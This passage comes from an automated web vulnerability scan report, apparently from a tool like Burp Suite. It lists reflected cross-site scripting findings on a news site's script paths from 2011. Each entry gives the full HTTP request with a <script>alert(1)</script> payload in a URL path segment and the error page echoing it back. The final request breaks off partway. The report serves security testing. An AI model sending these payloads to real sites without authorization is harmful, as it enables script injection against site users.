1.548. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 28f46<script>alert(1)</script>ffe21bb34fa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts28f46<script>alert(1)</script>ffe21bb34fa/jquery-ui-tabs.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:40 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts28f46<script>alert(1)</script>ffe21bb34fa/jquery-ui-tabs.js</p>
...[SNIP]...

1.549. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c836b<script>alert(1)</script>a7b055dba2a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.jsc836b<script>alert(1)</script>a7b055dba2a HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:42 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.jsc836b<script>alert(1)</script>a7b055dba2a</p>
...[SNIP]...

1.550. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4e88<script>alert(1)</script>3cef0b5eed2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigd4e88<script>alert(1)</script>3cef0b5eed2/WebPortal/nypost/scripts/jquery.corner.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 710
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigd4e88<script>alert(1)</script>3cef0b5eed2/WebPortal/nypost/scripts/jquery.corner.js</p>
...[SNIP]...

1.551. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 45a44<script>alert(1)</script>b7bd4f60237 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal45a44<script>alert(1)</script>b7bd4f60237/nypost/scripts/jquery.corner.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 710
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:42 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal45a44<script>alert(1)</script>b7bd4f60237/nypost/scripts/jquery.corner.js</p>
...[SNIP]...

1.552. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52ab5<script>alert(1)</script>9686bc16743 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost52ab5<script>alert(1)</script>9686bc16743/scripts/jquery.corner.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 710
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost52ab5<script>alert(1)</script>9686bc16743/scripts/jquery.corner.js</p>
...[SNIP]...

1.553. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ab38e<script>alert(1)</script>e81cd93691a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scriptsab38e<script>alert(1)</script>e81cd93691a/jquery.corner.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 710
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:46 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scriptsab38e<script>alert(1)</script>e81cd93691a/jquery.corner.js</p>
...[SNIP]...

1.554. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 91107<script>alert(1)</script>1453046d0a8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js91107<script>alert(1)</script>1453046d0a8 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 710
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:48 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery.corner.js91107<script>alert(1)</script>1453046d0a8</p>
...[SNIP]...

1.555. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 85a3a<script>alert(1)</script>ced33095086 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig85a3a<script>alert(1)</script>ced33095086/WebPortal/nypost/scripts/jquery.dimensions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:38 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig85a3a<script>alert(1)</script>ced33095086/WebPortal/nypost/scripts/jquery.dimensions.js</p>
...[SNIP]...

1.556. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d789f<script>alert(1)</script>06b4249b6a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortald789f<script>alert(1)</script>06b4249b6a1/nypost/scripts/jquery.dimensions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortald789f<script>alert(1)</script>06b4249b6a1/nypost/scripts/jquery.dimensions.js</p>
...[SNIP]...

1.557. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3000d<script>alert(1)</script>ade5b2dc97 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost3000d<script>alert(1)</script>ade5b2dc97/scripts/jquery.dimensions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost3000d<script>alert(1)</script>ade5b2dc97/scripts/jquery.dimensions.js</p>
...[SNIP]...

1.558. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 39730<script>alert(1)</script>fee20a13f35 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts39730<script>alert(1)</script>fee20a13f35/jquery.dimensions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:43 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts39730<script>alert(1)</script>fee20a13f35/jquery.dimensions.js</p>
...[SNIP]...

1.559. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4ad25<script>alert(1)</script>b1cb575786a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js4ad25<script>alert(1)</script>b1cb575786a HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 714
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:45 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js4ad25<script>alert(1)</script>b1cb575786a</p>
...[SNIP]...

1.560. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e3f8<script>alert(1)</script>a21161b9192 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig7e3f8<script>alert(1)</script>a21161b9192/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig7e3f8<script>alert(1)</script>a21161b9192/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js</p>
...[SNIP]...

1.561. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2e54f<script>alert(1)</script>a273c2c2869 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal2e54f<script>alert(1)</script>a273c2c2869/nypost/scripts/jquery.jcarousel.nyp.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:40 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal2e54f<script>alert(1)</script>a273c2c2869/nypost/scripts/jquery.jcarousel.nyp.js</p>
...[SNIP]...

1.562. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d29de<script>alert(1)</script>e1697fc8c9e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostd29de<script>alert(1)</script>e1697fc8c9e/scripts/jquery.jcarousel.nyp.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:42 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostd29de<script>alert(1)</script>e1697fc8c9e/scripts/jquery.jcarousel.nyp.js</p>
...[SNIP]...

1.563. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ca2e6<script>alert(1)</script>b68c9681711 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scriptsca2e6<script>alert(1)</script>b68c9681711/jquery.jcarousel.nyp.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scriptsca2e6<script>alert(1)</script>b68c9681711/jquery.jcarousel.nyp.js</p>
...[SNIP]...

1.564. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 90378<script>alert(1)</script>c769dcef57d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js90378<script>alert(1)</script>c769dcef57d HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:45 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js90378<script>alert(1)</script>c769dcef57d</p>
...[SNIP]...

1.565. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 67b87<script>alert(1)</script>9f7ce2b8387 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig67b87<script>alert(1)</script>9f7ce2b8387/WebPortal/nypost/scripts/jquery.liscroll.nyp.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:40 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig67b87<script>alert(1)</script>9f7ce2b8387/WebPortal/nypost/scripts/jquery.liscroll.nyp.js</p>
...[SNIP]...

1.566. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 947e2<script>alert(1)</script>de57eb99844 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal947e2<script>alert(1)</script>de57eb99844/nypost/scripts/jquery.liscroll.nyp.js HTTP/1.1
Host: www.nypost.com
